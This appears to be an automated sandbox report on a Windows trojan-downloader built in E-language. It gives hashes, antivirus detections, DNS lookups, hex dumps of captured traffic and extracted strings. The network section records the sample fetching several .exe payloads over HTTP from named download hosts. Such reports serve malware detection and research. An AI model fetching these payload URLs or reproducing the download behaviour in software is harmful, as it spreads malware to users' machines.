Analysis Date2015-01-14 12:19:21
MD5d160b25b6d28cce33c04ba45e771c60c
SHA1fc958ec964e8f91fb7fa19e4a2f55ab24d0fde10

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 3ab7719984b7154b4db2c7fc333bf707 sha1: be33e716a5ecd4726fc3de7da48a8721cd2eee8c size: 540672
Section.rdata md5: 18f42deefb7dc45699319d4eccd7fe9b sha1: a7db61dc987b08fe0edc5255c95267373eeb5eab size: 81920
Section.data md5: 41b270b81709fe21584d507a06779526 sha1: 9756874e54947f0c3868a816405f028c81b7865b size: 73728
Section.rsrc md5: 951cbe952550cc884883d9b40ad4cb42 sha1: 273c0f05f8fe9e7bd126c0116270234d8daf3e88 size: 69632
Timestamp2015-01-07 10:09:46
VersionLegalCopyright: 作者版权所有 请尊重并使用正版
FileVersion: 1.0.0.0
Comments: 本程序使用易语言编写(http://www.eyuyan.com)
ProductName: 易语言程序
ProductVersion: 1.0.0.0
FileDescription: 易语言程序
PackerMicrosoft Visual C++ v6.0
PEhasha55b53f9d383f809c6a6ad01df9b6540531b9a3c
IMPhash00e9ff8f7dab1222a9b3bb07bbeddc7e
AV360 Safeno_virus
AVAd-AwareTrojan.Generic.12504467
AVAlwil (avast)Malware-gen:Win32:Malware-gen
AVArcabit (arcavir)Trojan.Generic.12504467
AVAuthentiumW32/Agent.EW.gen!Eldorado
AVAvira (antivir)TR/Agent.770048.234
AVBullGuardTrojan.Generic.12504467
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)no_virus
AVClamAVno_virus
AVDr. Webno_virus
AVEmsisoftTrojan.Generic.12504467
AVEset (nod32)no_virus
AVFortinetW32/Badur.MSEK!tr
AVFrisk (f-prot)W32/Agent.EW.gen!Eldorado
AVF-SecureTrojan.Generic.12504467
AVGrisoft (avg)Win32/DH{IEGBDwCBEyIlV2dO}
AVIkarusno_virus
AVK7no_virus
AVKasperskyTrojan.Win32.Badur.msek
AVMalwareBytesSpyware.OnlineGames
AVMcafeeno_virus
AVMicrosoft Security Essentialsno_virus
AVMicroWorld (escan)no_virus
AVRisingno_virus
AVSophosno_virus
AVSymantecno_virus
AVTrend Microno_virus
AVVirusBlokAda (vba32)Trojan-Downloader.EIC.7121

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Crypto\RSA\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\a18ca4003deb042bbee7a40f15e1970b_666939c9-243b-475e-9504-51724db22670
Creates FileC:\malware.exe
Creates FilePIPE\lsarpc

Network Details:

DNSk.lssen.net
Type: A
223.6.254.23
DNSf.lssen.net
Type: A
42.121.253.211
DNS360.band.glb0.ldcache.net
Type: A
202.97.174.82
DNS360.band.glb0.ldcache.net
Type: A
183.61.19.168
DNSbgp5.yandui.com
Type: A
222.186.60.11
DNSbgp5.yandui.com
Type: A
61.147.108.34
DNSbgp5.yandui.com
Type: A
117.40.197.212
DNS4006869752.com
Type: A
60.172.228.28
DNS08911.xdwscache.glb0.lxdns.com
Type: A
8.37.235.5
DNS08911.xdwscache.glb0.lxdns.com
Type: A
8.37.235.6
DNS08911.xdwscache.glb0.lxdns.com
Type: A
8.37.234.3
DNS08911.xdwscache.glb0.lxdns.com
Type: A
8.37.234.4
DNS08911.xdwscache.glb0.lxdns.com
Type: A
8.37.235.2
DNS08911.xdwscache.glb0.lxdns.com
Type: A
8.37.235.3
DNSdown.9vh.net
Type: A
222.186.60.3
DNSc06.i06.arnic.hadns.net
Type: A
183.61.10.249
DNSc06.i06.arnic.hadns.net
Type: A
183.57.148.246
DNSwww.huohuasheji.com
Type: A
DNSwww.cdhomexpo.cn
Type: A
DNSdown.xiaoxinrili.com
Type: A
DNSdown.qunasou.com
Type: A
DNSj.union.ijinshan.com
Type: A
DNSdown.tianyunxj.com
Type: A
HTTP GEThttp://www.huohuasheji.com/kuplay_930_874824.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
HTTP GEThttp://www.cdhomexpo.cn/ffdy_434_874824.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
HTTP GEThttp://down.xiaoxinrili.com/hezi/jm/ad7147.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
HTTP GEThttp://down.qunasou.com/tq/tq_b_80282.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
HTTP GEThttp://4006869752.com/admin/get.php?user=114lm&id=22338&index=7
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
HTTP GEThttp://j.union.ijinshan.com/jump.php?u_key=389775
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
HTTP GEThttp://down.9vh.net/apples_19_708.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
HTTP GEThttp://down.tianyunxj.com/14/tqrl_93_708.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Flows TCP192.168.1.1:1031 ➝ 223.6.254.23:80
Flows TCP192.168.1.1:1032 ➝ 42.121.253.211:80
Flows TCP192.168.1.1:1033 ➝ 202.97.174.82:80
Flows TCP192.168.1.1:1034 ➝ 222.186.60.11:80
Flows TCP192.168.1.1:1035 ➝ 60.172.228.28:80
Flows TCP192.168.1.1:1036 ➝ 8.37.235.5:80
Flows TCP192.168.1.1:1037 ➝ 222.186.60.3:80
Flows TCP192.168.1.1:1038 ➝ 183.61.10.249:80

Raw Pcap
0x00000000 (00000)   47455420 2f6b7570 6c61795f 3933305f   GET /kuplay_930_
0x00000010 (00016)   38373438 32342e65 78652048 5454502f   874824.exe HTTP/
0x00000020 (00032)   312e310d 0a526566 65726572 3a206874   1.1..Referer: ht
0x00000030 (00048)   74703a2f 2f777777 2e68756f 68756173   tp://www.huohuas
0x00000040 (00064)   68656a69 2e636f6d 2f6b7570 6c61795f   heji.com/kuplay_
0x00000050 (00080)   3933305f 38373438 32342e65 78650d0a   930_874824.exe..
0x00000060 (00096)   41636365 70743a20 2a2f2a0d 0a416363   Accept: */*..Acc
0x00000070 (00112)   6570742d 4c616e67 75616765 3a207a68   ept-Language: zh
0x00000080 (00128)   2d636e0d 0a436f6e 74656e74 2d547970   -cn..Content-Typ
0x00000090 (00144)   653a2061 70706c69 63617469 6f6e2f78   e: application/x
0x000000a0 (00160)   2d777777 2d666f72 6d2d7572 6c656e63   -www-form-urlenc
0x000000b0 (00176)   6f646564 0d0a5573 65722d41 67656e74   oded..User-Agent
0x000000c0 (00192)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x000000d0 (00208)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x000000e0 (00224)   392e303b 2057696e 646f7773 204e5420   9.0; Windows NT 
0x000000f0 (00240)   362e313b 20313235 4c413b20 2e4e4554   6.1; 125LA; .NET
0x00000100 (00256)   20434c52 20322e30 2e353037 32373b20    CLR 2.0.50727; 
0x00000110 (00272)   2e4e4554 20434c52 20332e30 2e303435   .NET CLR 3.0.045
0x00000120 (00288)   30362e36 34383b20 2e4e4554 20434c52   06.648; .NET CLR
0x00000130 (00304)   20332e35 2e323130 3232290d 0a486f73    3.5.21022)..Hos
0x00000140 (00320)   743a2077 77772e68 756f6875 61736865   t: www.huohuashe
0x00000150 (00336)   6a692e63 6f6d0d0a 43616368 652d436f   ji.com..Cache-Co
0x00000160 (00352)   6e74726f 6c3a206e 6f2d6361 6368650d   ntrol: no-cache.
0x00000170 (00368)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f666664 795f3433 345f3837   GET /ffdy_434_87
0x00000010 (00016)   34383234 2e657865 20485454 502f312e   4824.exe HTTP/1.
0x00000020 (00032)   310d0a52 65666572 65723a20 68747470   1..Referer: http
0x00000030 (00048)   3a2f2f77 77772e63 64686f6d 6578706f   ://www.cdhomexpo
0x00000040 (00064)   2e636e2f 66666479 5f343334 5f383734   .cn/ffdy_434_874
0x00000050 (00080)   3832342e 6578650d 0a416363 6570743a   824.exe..Accept:
0x00000060 (00096)   202a2f2a 0d0a4163 63657074 2d4c616e    */*..Accept-Lan
0x00000070 (00112)   67756167 653a207a 682d636e 0d0a436f   guage: zh-cn..Co
0x00000080 (00128)   6e74656e 742d5479 70653a20 6170706c   ntent-Type: appl
0x00000090 (00144)   69636174 696f6e2f 782d7777 772d666f   ication/x-www-fo
0x000000a0 (00160)   726d2d75 726c656e 636f6465 640d0a55   rm-urlencoded..U
0x000000b0 (00176)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x000000c0 (00192)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x000000d0 (00208)   6c653b20 4d534945 20392e30 3b205769   le; MSIE 9.0; Wi
0x000000e0 (00224)   6e646f77 73204e54 20362e31 3b203132   ndows NT 6.1; 12
0x000000f0 (00240)   354c413b 202e4e45 5420434c 5220322e   5LA; .NET CLR 2.
0x00000100 (00256)   302e3530 3732373b 202e4e45 5420434c   0.50727; .NET CL
0x00000110 (00272)   5220332e 302e3034 3530362e 3634383b   R 3.0.04506.648;
0x00000120 (00288)   202e4e45 5420434c 5220332e 352e3231    .NET CLR 3.5.21
0x00000130 (00304)   30323229 0d0a486f 73743a20 7777772e   022)..Host: www.
0x00000140 (00320)   6364686f 6d657870 6f2e636e 0d0a4361   cdhomexpo.cn..Ca
0x00000150 (00336)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x00000160 (00352)   63616368 650d0a0d 0a2d6361 6368650d   cache....-cache.
0x00000170 (00368)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f68657a 692f6a6d 2f616437   GET /hezi/jm/ad7
0x00000010 (00016)   3134372e 65786520 48545450 2f312e31   147.exe HTTP/1.1
0x00000020 (00032)   0d0a5265 66657265 723a2068 7474703a   ..Referer: http:
0x00000030 (00048)   2f2f646f 776e2e78 69616f78 696e7269   //down.xiaoxinri
0x00000040 (00064)   6c692e63 6f6d2f68 657a692f 6a6d2f61   li.com/hezi/jm/a
0x00000050 (00080)   64373134 372e6578 650d0a41 63636570   d7147.exe..Accep
0x00000060 (00096)   743a202a 2f2a0d0a 41636365 70742d4c   t: */*..Accept-L
0x00000070 (00112)   616e6775 6167653a 207a682d 636e0d0a   anguage: zh-cn..
0x00000080 (00128)   436f6e74 656e742d 54797065 3a206170   Content-Type: ap
0x00000090 (00144)   706c6963 6174696f 6e2f782d 7777772d   plication/x-www-
0x000000a0 (00160)   666f726d 2d75726c 656e636f 6465640d   form-urlencoded.
0x000000b0 (00176)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x000000c0 (00192)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x000000d0 (00208)   69626c65 3b204d53 49452039 2e303b20   ible; MSIE 9.0; 
0x000000e0 (00224)   57696e64 6f777320 4e542036 2e313b20   Windows NT 6.1; 
0x000000f0 (00240)   3132354c 413b202e 4e455420 434c5220   125LA; .NET CLR 
0x00000100 (00256)   322e302e 35303732 373b202e 4e455420   2.0.50727; .NET 
0x00000110 (00272)   434c5220 332e302e 30343530 362e3634   CLR 3.0.04506.64
0x00000120 (00288)   383b202e 4e455420 434c5220 332e352e   8; .NET CLR 3.5.
0x00000130 (00304)   32313032 32290d0a 486f7374 3a20646f   21022)..Host: do
0x00000140 (00320)   776e2e78 69616f78 696e7269 6c692e63   wn.xiaoxinrili.c
0x00000150 (00336)   6f6d0d0a 43616368 652d436f 6e74726f   om..Cache-Contro
0x00000160 (00352)   6c3a206e 6f2d6361 6368650d 0a0d0a0d   l: no-cache.....
0x00000170 (00368)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f74712f 74715f62 5f383032   GET /tq/tq_b_802
0x00000010 (00016)   38322e65 78652048 5454502f 312e310d   82.exe HTTP/1.1.
0x00000020 (00032)   0a526566 65726572 3a206874 74703a2f   .Referer: http:/
0x00000030 (00048)   2f646f77 6e2e7175 6e61736f 752e636f   /down.qunasou.co
0x00000040 (00064)   6d2f7471 2f74715f 625f3830 3238322e   m/tq/tq_b_80282.
0x00000050 (00080)   6578650d 0a416363 6570743a 202a2f2a   exe..Accept: */*
0x00000060 (00096)   0d0a4163 63657074 2d4c616e 67756167   ..Accept-Languag
0x00000070 (00112)   653a207a 682d636e 0d0a436f 6e74656e   e: zh-cn..Conten
0x00000080 (00128)   742d5479 70653a20 6170706c 69636174   t-Type: applicat
0x00000090 (00144)   696f6e2f 782d7777 772d666f 726d2d75   ion/x-www-form-u
0x000000a0 (00160)   726c656e 636f6465 640d0a55 7365722d   rlencoded..User-
0x000000b0 (00176)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x000000c0 (00192)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x000000d0 (00208)   4d534945 20392e30 3b205769 6e646f77   MSIE 9.0; Window
0x000000e0 (00224)   73204e54 20362e31 3b203132 354c413b   s NT 6.1; 125LA;
0x000000f0 (00240)   202e4e45 5420434c 5220322e 302e3530    .NET CLR 2.0.50
0x00000100 (00256)   3732373b 202e4e45 5420434c 5220332e   727; .NET CLR 3.
0x00000110 (00272)   302e3034 3530362e 3634383b 202e4e45   0.04506.648; .NE
0x00000120 (00288)   5420434c 5220332e 352e3231 30323229   T CLR 3.5.21022)
0x00000130 (00304)   0d0a486f 73743a20 646f776e 2e71756e   ..Host: down.qun
0x00000140 (00320)   61736f75 2e636f6d 0d0a4361 6368652d   asou.com..Cache-
0x00000150 (00336)   436f6e74 726f6c3a 206e6f2d 63616368   Control: no-cach
0x00000160 (00352)   650d0a0d 0a2d6361 6368650d 0a0d0a0d   e....-cache.....
0x00000170 (00368)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f61646d 696e2f67 65742e70   GET /admin/get.p
0x00000010 (00016)   68703f75 7365723d 3131346c 6d266964   hp?user=114lm&id
0x00000020 (00032)   3d323233 33382669 6e646578 3d372048   =22338&index=7 H
0x00000030 (00048)   5454502f 312e310d 0a526566 65726572   TTP/1.1..Referer
0x00000040 (00064)   3a206874 74703a2f 2f343030 36383639   : http://4006869
0x00000050 (00080)   3735322e 636f6d2f 61646d69 6e2f6765   752.com/admin/ge
0x00000060 (00096)   742e7068 703f7573 65723d31 31346c6d   t.php?user=114lm
0x00000070 (00112)   2669643d 32323333 3826696e 6465783d   &id=22338&index=
0x00000080 (00128)   370d0a41 63636570 743a202a 2f2a0d0a   7..Accept: */*..
0x00000090 (00144)   41636365 70742d4c 616e6775 6167653a   Accept-Language:
0x000000a0 (00160)   207a682d 636e0d0a 436f6e74 656e742d    zh-cn..Content-
0x000000b0 (00176)   54797065 3a206170 706c6963 6174696f   Type: applicatio
0x000000c0 (00192)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x000000d0 (00208)   656e636f 6465640d 0a557365 722d4167   encoded..User-Ag
0x000000e0 (00224)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x000000f0 (00240)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000100 (00256)   49452039 2e303b20 57696e64 6f777320   IE 9.0; Windows 
0x00000110 (00272)   4e542036 2e313b20 3132354c 413b202e   NT 6.1; 125LA; .
0x00000120 (00288)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x00000130 (00304)   373b202e 4e455420 434c5220 332e302e   7; .NET CLR 3.0.
0x00000140 (00320)   30343530 362e3634 383b202e 4e455420   04506.648; .NET 
0x00000150 (00336)   434c5220 332e352e 32313032 32290d0a   CLR 3.5.21022)..
0x00000160 (00352)   486f7374 3a203430 30363836 39373532   Host: 4006869752
0x00000170 (00368)   2e636f6d 0d0a4361 6368652d 436f6e74   .com..Cache-Cont
0x00000180 (00384)   726f6c3a 206e6f2d 63616368 650d0a0d   rol: no-cache...
0x00000190 (00400)   0a                                    .

0x00000000 (00000)   47455420 2f6a756d 702e7068 703f755f   GET /jump.php?u_
0x00000010 (00016)   6b65793d 33383937 37352048 5454502f   key=389775 HTTP/
0x00000020 (00032)   312e310d 0a526566 65726572 3a206874   1.1..Referer: ht
0x00000030 (00048)   74703a2f 2f6a2e75 6e696f6e 2e696a69   tp://j.union.iji
0x00000040 (00064)   6e736861 6e2e636f 6d2f6a75 6d702e70   nshan.com/jump.p
0x00000050 (00080)   68703f75 5f6b6579 3d333839 3737350d   hp?u_key=389775.
0x00000060 (00096)   0a416363 6570743a 202a2f2a 0d0a4163   .Accept: */*..Ac
0x00000070 (00112)   63657074 2d4c616e 67756167 653a207a   cept-Language: z
0x00000080 (00128)   682d636e 0d0a436f 6e74656e 742d5479   h-cn..Content-Ty
0x00000090 (00144)   70653a20 6170706c 69636174 696f6e2f   pe: application/
0x000000a0 (00160)   782d7777 772d666f 726d2d75 726c656e   x-www-form-urlen
0x000000b0 (00176)   636f6465 640d0a55 7365722d 4167656e   coded..User-Agen
0x000000c0 (00192)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x000000d0 (00208)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x000000e0 (00224)   20392e30 3b205769 6e646f77 73204e54    9.0; Windows NT
0x000000f0 (00240)   20362e31 3b203132 354c413b 202e4e45    6.1; 125LA; .NE
0x00000100 (00256)   5420434c 5220322e 302e3530 3732373b   T CLR 2.0.50727;
0x00000110 (00272)   202e4e45 5420434c 5220332e 302e3034    .NET CLR 3.0.04
0x00000120 (00288)   3530362e 3634383b 202e4e45 5420434c   506.648; .NET CL
0x00000130 (00304)   5220332e 352e3231 30323229 0d0a486f   R 3.5.21022)..Ho
0x00000140 (00320)   73743a20 6a2e756e 696f6e2e 696a696e   st: j.union.ijin
0x00000150 (00336)   7368616e 2e636f6d 0d0a4361 6368652d   shan.com..Cache-
0x00000160 (00352)   436f6e74 726f6c3a 206e6f2d 63616368   Control: no-cach
0x00000170 (00368)   650d0a0d 0a0a4361 6368652d 436f6e74   e.....Cache-Cont
0x00000180 (00384)   726f6c3a 206e6f2d 63616368 650d0a0d   rol: no-cache...
0x00000190 (00400)   0a                                    .

0x00000000 (00000)   47455420 2f617070 6c65735f 31395f37   GET /apples_19_7
0x00000010 (00016)   30382e65 78652048 5454502f 312e310d   08.exe HTTP/1.1.
0x00000020 (00032)   0a526566 65726572 3a206874 74703a2f   .Referer: http:/
0x00000030 (00048)   2f646f77 6e2e3976 682e6e65 742f6170   /down.9vh.net/ap
0x00000040 (00064)   706c6573 5f31395f 3730382e 6578650d   ples_19_708.exe.
0x00000050 (00080)   0a416363 6570743a 202a2f2a 0d0a4163   .Accept: */*..Ac
0x00000060 (00096)   63657074 2d4c616e 67756167 653a207a   cept-Language: z
0x00000070 (00112)   682d636e 0d0a436f 6e74656e 742d5479   h-cn..Content-Ty
0x00000080 (00128)   70653a20 6170706c 69636174 696f6e2f   pe: application/
0x00000090 (00144)   782d7777 772d666f 726d2d75 726c656e   x-www-form-urlen
0x000000a0 (00160)   636f6465 640d0a55 7365722d 4167656e   coded..User-Agen
0x000000b0 (00176)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x000000c0 (00192)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x000000d0 (00208)   20392e30 3b205769 6e646f77 73204e54    9.0; Windows NT
0x000000e0 (00224)   20362e31 3b203132 354c413b 202e4e45    6.1; 125LA; .NE
0x000000f0 (00240)   5420434c 5220322e 302e3530 3732373b   T CLR 2.0.50727;
0x00000100 (00256)   202e4e45 5420434c 5220332e 302e3034    .NET CLR 3.0.04
0x00000110 (00272)   3530362e 3634383b 202e4e45 5420434c   506.648; .NET CL
0x00000120 (00288)   5220332e 352e3231 30323229 0d0a486f   R 3.5.21022)..Ho
0x00000130 (00304)   73743a20 646f776e 2e397668 2e6e6574   st: down.9vh.net
0x00000140 (00320)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x00000150 (00336)   206e6f2d 63616368 650d0a0d 0a68652d    no-cache....he-
0x00000160 (00352)   436f6e74 726f6c3a 206e6f2d 63616368   Control: no-cach
0x00000170 (00368)   650d0a0d 0a0a4361 6368652d 436f6e74   e.....Cache-Cont
0x00000180 (00384)   726f6c3a 206e6f2d 63616368 650d0a0d   rol: no-cache...
0x00000190 (00400)   0a                                    .

0x00000000 (00000)   47455420 2f31342f 7471726c 5f39335f   GET /14/tqrl_93_
0x00000010 (00016)   3730382e 65786520 48545450 2f312e31   708.exe HTTP/1.1
0x00000020 (00032)   0d0a5265 66657265 723a2068 7474703a   ..Referer: http:
0x00000030 (00048)   2f2f646f 776e2e74 69616e79 756e786a   //down.tianyunxj
0x00000040 (00064)   2e636f6d 2f31342f 7471726c 5f39335f   .com/14/tqrl_93_
0x00000050 (00080)   3730382e 6578650d 0a416363 6570743a   708.exe..Accept:
0x00000060 (00096)   202a2f2a 0d0a4163 63657074 2d4c616e    */*..Accept-Lan
0x00000070 (00112)   67756167 653a207a 682d636e 0d0a436f   guage: zh-cn..Co
0x00000080 (00128)   6e74656e 742d5479 70653a20 6170706c   ntent-Type: appl
0x00000090 (00144)   69636174 696f6e2f 782d7777 772d666f   ication/x-www-fo
0x000000a0 (00160)   726d2d75 726c656e 636f6465 640d0a55   rm-urlencoded..U
0x000000b0 (00176)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x000000c0 (00192)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x000000d0 (00208)   6c653b20 4d534945 20392e30 3b205769   le; MSIE 9.0; Wi
0x000000e0 (00224)   6e646f77 73204e54 20362e31 3b203132   ndows NT 6.1; 12
0x000000f0 (00240)   354c413b 202e4e45 5420434c 5220322e   5LA; .NET CLR 2.
0x00000100 (00256)   302e3530 3732373b 202e4e45 5420434c   0.50727; .NET CL
0x00000110 (00272)   5220332e 302e3034 3530362e 3634383b   R 3.0.04506.648;
0x00000120 (00288)   202e4e45 5420434c 5220332e 352e3231    .NET CLR 3.5.21
0x00000130 (00304)   30323229 0d0a486f 73743a20 646f776e   022)..Host: down
0x00000140 (00320)   2e746961 6e79756e 786a2e63 6f6d0d0a   .tianyunxj.com..
0x00000150 (00336)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x00000160 (00352)   6f2d6361 6368650d 0a0d0a2d 63616368   o-cache....-cach
0x00000170 (00368)   650d0a0d 0a0a4361 6368652d 436f6e74   e.....Cache-Cont
0x00000180 (00384)   726f6c3a 206e6f2d 63616368 650d0a0d   rol: no-cache...
0x00000190 (00400)   0a                                    .


Strings
....  ................
"#
....
.
.........
10/.-,+*)('&%$#"! ..............
.....
..........
..
.PNG
.
: ''..
...
.........
-
..
.0[]: 
.
.
 
 
 
 
@
@
.
 
.
.
..
.
..
.
.
.0
x
.
==
...
.
 
-% BbmHpAadYySMI \
.-E-0-0..
00-+ 
e
 
00...........?-  
0
0 
0
?
u

    
 ......
 (*.*)
#####
#######
080404B0
 %1 
1.0.0.0
	1uM
(&C)
Comments
	Ctrl+
	Ctrl+D
	Ctrl+End
	Ctrl+G
	Ctrl+Home
	Ctrl+N
	Ctrl+PageDown
	Ctrl+PageUp
	&D.
DEFAULT_ICON
 DLL 
(&E)
FileDescription
FileVersion
         (((((                  H
(&H)
Hjjj
Hjjjj
Hjjjjjjjj
(http://www.eyuyan.com)
(&I)
 INI 
jjjj
jjjjjj
LegalCopyright
msctls_progress32
msctls_updown32
MS Shell Dlg
(&N)
(null)
(&O)
(&P)
	PageDown
	PageUp
(<Pcw
ProductName
ProductVersion
Progress1
 %s 
(&S)
	Shift+Tab
Spin1
StringFileInfo
(&T)
	Tab/Enter
TEXTINCLUDE
Translation
VarFileInfo
VS_VERSION_INFO
xxxx
^,_^][
^$_^[]
 (*.*)|*.*||
[================================]
	!	!	!	!	
								
																																																																
00003333
0123456789ABCDEF
(&07-034/)7 '
0B=(tJ
0dk:ghV
 0@P`p
0R>\W[
!101)! !
123456789
)141!141
141B{y{)kik1
,1"52.*
1),)9JMJ9
!1AQaq
1#QNAN
1#SNAN
	2	5	5	5	5	5
"2BRbr
%+.2d%.2d
;=3333v
#3CScs
3;L$4s
$4DTdt
4i5U6B738%9
\$4t|Ht@H
|?5^<@
5	!	!	!	!
	5	5	5
%5EUeu
5F99C1642A2F4e03850721B4F5D7C3F8
	6	6	6	6
	6	6	6	6	6	6	6	6	6	6	,	,	,	,	,	,	,	,	+	+	+	+	+	/	/	/	'	'	'	'	'	'	'	'	'	'	(	(	(	(	(	(	(	(	(	(	(	(	(	
&6FVfv
707ca37322474f6ca841f0e224f4b620
	7	7	7	7	7	7	7	7	7	7	7	*	*	-	-	-	-
'7GWgw
7wwgwwv
7wwwwwv
(8HXhx
8MThdu
\$8UVW
9^0u/j
91419JMJ9sqs1
91419Z]Z9
989!cec
9|$8tt
'9A`u"9
9BAB9BAB9BAB9BAB99<9B9<9BBAB9BAB9),)B
9D$$t+
)9IYiy
9L$x~k
9l$xtU9
9nPu	9^T
9o4u'V
	9oTtc
9t$0v8
~(9~$u
9^xu5j
<A|2<Z
a background color must be supplied to remove alpha/transparency
abcddefghijklmnoopqrrsstuvvwwxyyz;
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
abnormal program termination
Accept:
Accept: */*
Accept: */* 
Accept-Language:
Accept-Language: zh-cn
%a, %d %b %Y %H:%M:%S 
AdjustWindowRectEx
advapi32.dll
Advapi32.dll
ADVAPI32.dll
AfxControlBar42s
AfxFrameOrView42s
AfxMDIFrame42s
AfxOldWndProc423
AfxOleControl42s
AfxWnd42s
Afx:%x:%x
Afx:%x:%x:%x:%x:%x
AppendMenuA
Application built with libpng-
Application must supply a known background gamma
Arg list too long
.?AUCThreadData@@
August
.?AV_AFX_BASE_MODULE_STATE@@
.?AV_AFX_CHECKLIST_STATE@@
.?AV_AFX_COLOR_STATE@@
.?AV_AFX_CTL3D_STATE@@
.?AV_AFX_CTL3D_THREAD@@
.?AVAFX_MODULE_STATE@@
.?AVAFX_MODULE_THREAD_STATE@@
.?AV_AFX_SOCK_STATE@@
.?AV_AFX_THREAD_STATE@@
.?AV_AFX_WIN_STATE@@
.?AVCArchiveException@@
.?AVCBitmap@@
.?AVCBrush@@
.?AVCButton@@
.?AVCClientDC@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCColorDialog@@
.?AVCComboBox@@
.?AVCCommonDialog@@
.?AVCCriticalSection@@
.?AVCDC@@
.?AVCDialog@@
.?AVCDWordArray@@
.?AVCEdit@@
.?AVCException@@
.?AVCFile@@
.?AVCFileDialog@@
.?AVCFileException@@
.?AVCGdiObject@@
.?AVCHandleMap@@
.?AVCImageList@@
.?AVCMapPtrToPtr@@
.?AVCMapStringToPtr@@
.?AVCMemFile@@
.?AVCMemoryException@@
.?AVCMenu@@
.?AVCNoTrackObject@@
.?AVCNotSupportedException@@
.?AVCObject@@
.?AVCPaintDC@@
.?AVCPen@@
.?AVCProgressCtrl@@
.?AVCPtrArray@@
.?AVCPtrList@@
.?AVCResourceException@@
.?AVCRgn@@
.?AVCSessionMapPtrToPtr@@
.?AVCSharedFile@@
.?AVCSimpleException@@
.?AVCStatic@@
.?AVCStringArray@@
.?AVCSyncObject@@
.?AVCTempDC@@
.?AVCTempGdiObject@@
.?AVCTempImageList@@
.?AVCTempMenu@@
.?AVCTempWnd@@
.?AVCTestCmdUI@@
.?AVCToolTipCtrl@@
.?AVCUserException@@
.?AVCWinApp@@
.?AVCWindowDC@@
.?AVCWinThread@@
.?AVCWnd@@
.?AVCWordArray@@
.?AVtype_info@@
<A|@<Z
B 02CV
BAB!{}{
)BAB1BABB
BAB9RQR1
bad adaptive filter value
Bad address
bad background index (internal error)
bad color-map processing (internal error)
bad compression info
bad compression method
bad data option (internal error)
bad encoding (internal error)
Bad file descriptor
bad height format
bad keyword
bad longjmp: 
bad parameters to zlib
bad processing option (internal error)
bad width format
= baLt = ZYXt
B#C0D?EQFeG|H
bcdfghijklmnpqrstuvwxyz
BeginPaint
BeginPath
BitBlt
BKbhTb~XBK!;
bKGD must be after
Bkik1{y{)141B
 (*.BMP)|*.BMP|GIF
Bogus message code %d
Broken pipe
BRPj+S
buffer error
 but running with 
C =02CVu
CallNextHookEx
Call to NULL read function
CallWindowProcA
Can't set both read_data_fn and write_data_fn in the same structure
=capst
CArchiveException
C:\BaiduAn.Setup.1117.3.0.0.3974_1000163887.exe
C:\Baidusd.Setup.3.0.0.4607.youqian_1000163887.exe
C:\bdBrowserSetup-5955-ftn_1000163887.exe
CBitmap
CBrush
CButton
CClientDC
CCmdTarget
CColorDialog
CColourPicker
CComboBox
CCriticalSection
Cc: %s
CDialog
CDWordArray
cec!101
CException
CFileDialog
CFileException
CGdiObject
CharUpperA
CheckMenuItem
ChildWindowFromPointEx
ChooseColorA
